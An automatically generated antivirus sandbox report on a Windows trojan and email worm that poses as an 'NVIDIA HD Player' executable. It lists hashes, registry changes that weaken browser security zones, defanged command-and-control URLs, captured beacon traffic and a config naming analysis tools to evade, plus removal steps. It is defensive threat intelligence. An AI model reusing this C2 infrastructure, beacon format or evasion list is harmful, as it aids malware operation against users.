Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 0fe7961b5f32be76f5055d4431232e02
SHA1: 92a3ebcf1780ea861403ca2b84a2d26c25555ddb
SHA256: 9561630c4e4add89cd362dbd58ead4344df211384b1c4691b28a3553cc2a9aa5
SSDeep: 49152:p06Z8 CZahRQ6 z9vOkYlG4N iuaUIXiEu:f6ZahRQvzpOkYlG4N iuglu
Size: 3129344 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC50, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-09-10 09:35:54
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
attrib.exe:1392
The Trojan injects its code into the following process(es):
%original file name%.exe:1460
Mutexes
The following mutexes were created/opened:
AMResourceMutex2
ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:1460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.sogou[1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sysboom.duapp[1].txt (200 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (675 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10892 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (311 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)
Registry activity
The process %original file name%.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows Script\Settings]
"JITDebug" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 37 3C 47 42 D6 06 26 0C 91 3B FB 78 18 28 AA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process attrib.exe:1392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 D1 E9 9D CF 6F 8E 01 CE E5 F8 1B 4E C4 77 3D"
Dropped PE files
MD5 | File path |
---|---|
7283299a80a0bcdd07ddb32efa4d0c2c | c:\WINDOWS\system\exdui.dll |
7283299a80a0bcdd07ddb32efa4d0c2c | c:\exdui.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
attrib.exe:1392
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[1].txt (791 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.sogou[1].txt (162 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sysboom.duapp[1].txt (200 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (675 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
%WinDir%\system\exdui.dll (42 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (10892 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.so[2].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (311 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: NVIDIA Corporation
Product Name: HD Player
Product Version: 2.3.1.3
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.3.1.3
File Description:
Comments:
Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 2175466 | 2179072 | 4.33883 | dc37bc87fd606900a922b91c28c4c8c3 |
.rdata | 2183168 | 469776 | 471040 | 4.88407 | 80d022cc38b23077c1210cee2e0c223b |
.data | 2654208 | 364017 | 90112 | 3.52306 | 0a032db0534453f043a5353cf0d63907 |
.rsrc | 3018752 | 383700 | 385024 | 1.55761 | 0c8967591a131031440442acbdae9df8 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://sysn.applinzi.com/tool/get_date.php | |
hxxp://duapp.n.shifen.com/music/url.txt | |
hxxp://sysn.applinzi.com/now_set.php | |
hxxp://sysn.applinzi.com/calc_online/calc.php | |
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250273372 | |
hxxp://www.a.shifen.com/s?wd=AAA266314320305272344325250 | |
hxxp://so.qh-lb.com/s?q=aaa短信轰炸机 | |
hxxp://so.qh-lb.com/s?q=aaa短信轰炸 | |
hxxp://www.a.shifen.com/s?wd=www.aaazha.com | |
hxxp://www.baidu.com/s?wd=AAA.......... | |
hxxp://www.baidu.com/s?wd=AAA........ | |
hxxp://www.so.com/s?q=aaa短信轰炸 | 106.120.160.134 |
hxxp://www.db-ha.com/now_set.php | 220.181.136.41 |
hxxp://www.haosou.com/s?q=aaa短信轰炸 | 125.88.193.243 |
hxxp://www.db-ha.com/calc_online/calc.php | 220.181.136.41 |
hxxp://www.haosou.com/s?q=aaa短信轰炸机 | 125.88.193.243 |
hxxp://www.baidu.com/s?wd=www.aaazha.com | |
hxxp://www.db-ha.com/tool/get_date.php | 220.181.136.41 |
hxxp://www.so.com/s?q=aaa短信轰炸机 | 106.120.160.134 |
hxxp://sysboom.duapp.com/music/url.txt | 220.181.7.172 |
www.sogou.com | 203.90.249.162 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /s?q=aaa短信轰炸机 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 05 Oct 2016 23:17:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Set-Cookie: QiHooGUID=F9145230C09493E46C8AB693BAD1011E.1475709426775; expires=Fri, 05-Oct-2018 23:17:06 GMT; path=/
Set-Cookie: _S=lrev8rg26lsl3nqlf0cmfclrl3; expires=Wed, 05-Oct-2016 23:27:06 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tso_Anoyid=11147570942619424242; expires=Fri, 05-Oct-2018 23:17:06 GMT; path=/
<<< skipped >>>
GET /s?wd=AAA.......... HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2016 23:16:57 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Set-Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: PSTM=1475709416; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=94; path=/
Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Cache-Control: private
Cxy_all: baidu 0c86f471760cdece4b2b4178c12f7153
Cxy_ex: 1475709417 3663786690 d41d8cd98f00b204e9800998ecf8427e
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0x83a1b5c9000222bc
BDUSERID: 0
<<< skipped >>>
GET /s?wd=AAA........ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; PSTM=1475709416; H_PS_PSSID=1446_18282_17943_21120_21191_21161; BD_CK_SAM=1; BDSVRTM=94
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2016 23:16:58 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu a8c3b2015de22305f035b39cde82d80e
Cxy_ex: 1475709418 3663786690 1d1fc270c63b26659ac8d100bcebdc02
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xf93f43f50002128d
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=96; path=/
Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com
<<< skipped >>>
GET /s?wd=VVV.aaazha.com HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.baidu.com
Cache-Control: no-cache
Cookie: BAIDUID=D5AFD4BF0DE069D4127B6171812A2F42:FG=1; BIDUPSID=D5AFD4BF0DE069D4127B6171812A2F42; PSTM=1475709416; H_PS_PSSID=1446_18282_17943_21120_21191_21161; BD_CK_SAM=1; BDSVRTM=96
HTTP/1.1 200 OK
Date: Wed, 05 Oct 2016 23:17:12 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: Keep-Alive
Vary: Accept-Encoding
Cache-Control: private
Cxy_all: baidu 79552b80398715448ddb86ba214bd7fd
Cxy_ex: 1475709432 3663786690 1d1fc270c63b26659ac8d100bcebdc02
X-Powered-By: HPHP
Server: BWS/1.1
X-UA-Compatible: IE=Edge,chrome=1
BDPAGETYPE: 3
BDQID: 0xa26cea7f000258a4
BDUSERID: 0
Set-Cookie: BD_CK_SAM=1;path=/
Set-Cookie: BDSVRTM=139; path=/
Set-Cookie: H_PS_PSSID=1446_18282_17943_21120_21191_21161; path=/; domain=.baidu.com
<<< skipped >>>
GET /tool/get_date.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.db-ha.com/tool/get_date.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: VVV.db-ha.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: sae
Date: Wed, 05 Oct 2016 23:16:54 GMT
Content-Type: text/html
Content-Length: 19
Connection: keep-alive
Via: 10.13.144.188
2016-10-06 07:16:54
GET /calc_online/calc.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.db-ha.com/calc_online/calc.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Host: VVV.db-ha.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: sae
Date: Wed, 05 Oct 2016 23:16:56 GMT
Content-Type: text/html
Content-Length: 13
Connection: keep-alive
Via: 10.13.144.239
Set-Cookie: VGOTCN_OnLineCount=U36
[now]_81[now]
GET /s?q=aaa短信轰炸 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.so.com
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: QiHooGUID=F9145230C09493E46C8AB693BAD1011E.1475709426775; _S=lrev8rg26lsl3nqlf0cmfclrl3; tso_Anoyid=11147570942619424242
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 05 Oct 2016 23:17:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
<<< skipped >>>
POST /now_set.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.db-ha.com/now_set.php
Accept-Language: zh-CN,zh;q=0.8,ja;q=0.6
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Host: VVV.db-ha.com
Content-Length: 213
Cache-Control: no-cache
sos=1&key_1=94915c80f8a084lPl5M5y38K&key_2=10144f1e091b08bjK119WLVp4&ver=2.313&open=ooo2313&act=&md_sta=e656849a8c8c56f7f668f92d0182e6cb&time=2016-10-06 07:16:54&onlineF=1d8cf39371716fb36c6ecd85f2241433&dynasty=n6
HTTP/1.1 200 OK
Server: sae
Date: Wed, 05 Oct 2016 23:16:55 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 3881
Connection: keep-alive
Via: 10.13.144.188
[s1]SOFTWARE\Now_warks\[s1][s2]%WinDir%\system\WINSPLEDX[s2][s3]SOFTWARE\Now_warkO\[s3][s4]C:\Windows\show2.jpg[s4][s5]hXXp://VVV.db-ha.com/calc_online/calc.php[s5][s6]600000[s6][b1]%WinDir%\system\JspXmlFora.txt[b1][s14]SmartSniff|Fiddler|...............|Wireshark|Charles|WinSock Expert[s14][s15]999999999[s15][s17]C:\Windows\System\background_image.jpg[s17][s19]hXXp://n.aaazha.com/page/study/teaManager.html[s19][F1]24,1A,D7,4B,63,5D,95,8F,37,17,96,A6,77,33,BA,C2,[F1][F2]d2VibWFzdGVyQEhLNzE4MDk=[F2][F3]dsll=207[F3][F4]/WEB/D_Jk/[F4][F5]/WEB/D_ym_Jk/[F5][F6]1[F6][F7]1[F7][F8]5[F8][s20]C:\Windows\System\get_local_datum.txt[s20][dlyc]40000[dlyc][fzbyc]30000[fzbyc][jcmc]AAA...............[jcmc][sypost]3[sypost][xmlHttp_GetInfo]1[xmlHttp_GetInfo][xmlHttp_AddCode]1[xmlHttp_AddCode][GetFried]73[GetFried][upHelp]69[upHelp][back_url]hXXp://VVV.db-ha.com/back_list/content.txt[back_url][skype_url]hXXp://n.aaazha.com/page/study/skype.html[skype_url][admin_url]hXXp://VVV.baidu.com[admin_url][s21]54,32,02,ED,D5,B5,3C,E8,30,84,76,C2,5E,F4,02,16,35,87,15,E6,B7,D6,CE,[s21][s22]hXXp://cgi.im.qq.com/cgi-bin/cgi_svrtime[s22][min]1120[min][max]1500[max][p=obs]A3,A9,[obs][p=obp]25,7A,57,[obp][strcd]15[strcd][strbs]gnb*[strbs][getCoot]15[getCoot][senKet]8*66[senKet][sz166]1500[sz166][sz52k]10000[sz52k][mmd88]76.com[mmd88][objokj]baidu.com[objokj][de3]720000[de3][addBase]14[addBase][http-s]image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, ap
<<< skipped >>>
GET /music/url.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: sysboom.duapp.com
Cache-Control: no-cache
HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 05 Oct 2016 23:16:54 GMT
Content-Type: text/html
Content-Length: 345
Connection: keep-alive
Set-Cookie: BAEID=61048F546A35CDB463F5F04B98D1F275; expires=Thu, 05-Oct-17 23:16:54 GMT; max-age=31536000; path=/; version=1
<?xml version="1.0" encoding="iso-8859-1"?>.<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">. <head>. <title>404 - Not Found</title>. </head>. <body>. <h1>404 - Not Found</h1>. </body>.</html>.
GET /s?q=aaa短信轰炸 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 05 Oct 2016 23:17:09 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaa短信轰炸
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
GET /s?q=aaa短信轰炸机 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: VVV.haosou.com
Cache-Control: no-cache
HTTP/1.1 301 Moved Permanently
Server: openresty
Date: Wed, 05 Oct 2016 23:17:05 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.so.com/s?q=aaa短信轰炸机
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>....
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1460:
hXXp://VVV.db-ha.com/
hXXp://VVV.db-ha.com/
hXXp://VVV.v-update.com/
hXXp://VVV.v-update.com/
hXXp://VVV.l-last.win/
hXXp://VVV.l-last.win/
hXXp://VVV.l-loan.loan
hXXp://VVV.l-loan.loan
hXXp://VVV.l-last.win/
hXXp://VVV.l-last.win/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.aaa-info.vip/
hXXp://VVV.z-win.win/
hXXp://VVV.z-win.win/
[back_url]
[back_url]
[skype_url]
[skype_url]
[admin_url]
[admin_url]
[xmlHttp_GetInfo]
[xmlHttp_GetInfo]
[xmlHttp_AddCode]
[xmlHttp_AddCode]
[http-s]
[http-s]
[http-l]
[http-l]
[qiangz_url]
[qiangz_url]
hXXp://site.dxhz.vip/
hXXp://site.dxhz.vip/
[emsg]
[emsg]
[msg]
[msg]
hXXp://sysboom.duapp.com/music/url.txt
hXXp://sysboom.duapp.com/music/url.txt
hXXp://sysboom.duapp.com
hXXp://sysboom.duapp.com
@1970-01-01 08:00:00
@1970-01-01 08:00:00
application/x-www-form-urlencoded
application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies
\*.txt
\*.txt
&key=
&key=
open_url_lalala_w
open_url_lalala_w
\Tencent\QQ\Misc\*.*
\Tencent\QQ\Misc\*.*
/Mail.php
/Mail.php
\host_ip.txt
\host_ip.txt
*.txt
*.txt
|*.txt
|*.txt
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
User-Agent: Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
aaafz.ini
aaafz.ini
_en.exe
_en.exe
%WinDir%\
%WinDir%\
TStdHttpAnalyzerForm
TStdHttpAnalyzerForm
%f%%f
%f%%f
7".Fv
7".Fv
>.OsM
>.OsM
r.vDO
r.vDO
,uy.vj
,uy.vj
.z[.Rtp
.z[.Rtp
qiTXtXML:com.adobe.xmp
qiTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
!iTXtXML:com.adobe.xmp
!iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
"iTXtXML:com.adobe.xmp
"iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> G7
" id="W5M0MpCehiHzreSzNTczkc9d"?> G7
iTXtXML:com.adobe.xmp
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
c-V}Sk^
c-V}Sk^
.pNA$ }C
.pNA$ }C
ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY
ImageMagick 6.8.8-7 Q16 x86_64 2014-02-28 hXXp://VVV.imagemagick.orgY
1398346191
1398346191
file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png
file:///home/ftp/1520/easyicon.cn/easyicon.cn/cdn-img.easyicon.cn/png/11495/1149545.png
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
:15.0.0.0:80
:15.0.0.0:80
:1.0.0.0:8
:1.0.0.0:8
:*.*.*.*:**
:*.*.*.*:**
[1][0-9]{10}
[1][0-9]{10}
hXXp://m.ip138.com/mobile.asp?mobile=
hXXp://m.ip138.com/mobile.asp?mobile=
" id="W5M0MpCehiHzreSzNTczkc9d"?> 0@z$
" id="W5M0MpCehiHzreSzNTczkc9d"?> 0@z$
" id="W5M0MpCehiHzreSzNTczkc9d"?> *b)
" id="W5M0MpCehiHzreSzNTczkc9d"?> *b)
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
>i!M.".eH/;
>i!M.".eH/;
" id="W5M0MpCehiHzreSzNTczkc9d"?> =J,6
" id="W5M0MpCehiHzreSzNTczkc9d"?> =J,6
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
1Kw%C
1Kw%C
hXXp://VVV.baidu.com/s?wd=
hXXp://VVV.baidu.com/s?wd=
\historyRecord.txt
\historyRecord.txt
.IDATx
.IDATx
function time(){return Math.random()}
function time(){return Math.random()}
/new_par/isonLine.php
/new_par/isonLine.php
/UserFriedManager.php
/UserFriedManager.php
hXXps://VVV.baidu.com/s?wd=
hXXps://VVV.baidu.com/s?wd=
\exdui.dll
\exdui.dll
C:\Windows\System\exdui.dll
C:\Windows\System\exdui.dll
z.vkDL"
z.vkDL"
Riched20.dll
Riched20.dll
Microsoft.XMLDOM
Microsoft.XMLDOM
number is %d.
number is %d.
:"%s"
:"%s"
%:.NG2r8%4/h
%:.NG2r8%4/h
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ATL.DLL
ATL.DLL
GDI32.dll
GDI32.dll
MSVCRT.dll
MSVCRT.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
cmd /c attrib s a h r
cmd /c attrib s a h r
cmd /c
cmd /c
/user_string/get.php?u=
/user_string/get.php?u=
/sendEmail/SendIsNew.php
/sendEmail/SendIsNew.php
%WinDir%\aaafz_begin.bat
%WinDir%\aaafz_begin.bat
/user_string/add.php
/user_string/add.php
/UserHelper/xmlHttp_AddCode.php
/UserHelper/xmlHttp_AddCode.php
http:
http:
" id="W5M0MpCehiHzreSzNTczkc9d"?> "v
" id="W5M0MpCehiHzreSzNTczkc9d"?> "v
/UserHelper/xmlHttp_GetInfo.php
/UserHelper/xmlHttp_GetInfo.php
/UserHelper/xmlHttp_SetUserInfo.php
